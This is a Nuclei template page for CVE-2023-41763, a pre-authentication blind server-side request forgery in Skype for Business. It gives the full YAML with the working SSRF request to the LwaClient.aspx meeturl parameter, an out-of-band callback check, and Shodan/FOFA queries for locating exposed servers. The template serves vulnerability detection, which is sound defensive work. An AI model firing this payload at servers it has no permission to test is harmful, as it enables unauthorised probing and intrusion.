Skip to content
Nuclei Templates

Skype for Business 2019 (SfB) - Blind Server-side Request Forgery

ID: CVE-2023-41763

Severity: medium

Author: hateshape

Tags: cve,cve2023,skype,blind-ssrf,oast,ssrf,kev,microsoft

Description

Section titled “Description”

Skype Pre-Auth Server-side Request Forgery (SSRF) vulnerability

YAML Source

Section titled “YAML Source”
id: CVE-2023-41763


info:
  name: Skype for Business 2019 (SfB) - Blind Server-side Request Forgery
  author: hateshape
  severity: medium
  description: |
    Skype Pre-Auth Server-side Request Forgery (SSRF) vulnerability
  reference:
    - https://frycos.github.io/vulns4free/2022/09/26/skype-audit-part2.html
    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-41763
    - https://nvd.nist.gov/vuln/detail/CVE-2023-41763
    - https://github.com/Ostorlab/KEV
    - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-41763
    epss-score: 0.04783
    epss-percentile: 0.92691
    cpe: cpe:2.3:a:microsoft:skype_for_business_server:2015:cumulative_update_13:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: microsoft
    product: skype_for_business_server
    shodan-query:
      - html:"Skype for Business"
      - http.html:"skype for business"
    fofa-query: body="skype for business"
  tags: cve,cve2023,skype,blind-ssrf,oast,ssrf,kev,microsoft
variables:
  ssrfpayload: "http://{{interactsh-url}}/?id={{rand_base(3)}}%25{1337*1337}#.xx//"


http:
  - raw:
      - |
        GET /lwa/Webpages/LwaClient.aspx?meeturl={{base64(ssrfpayload)}} HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"


      - type: word
        part: body
        words:
          - 'Skype'
# digest: 4a0a00473045022100a5a3458bb88af0d826e7fc18b1a71fc0d2f57501488edf6d3668be3834f6639e0220295f3b1aff03b8a881649e89e8949ba200512161af8297b3d8f16fd428f457f6:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-41763.yaml"

View on Github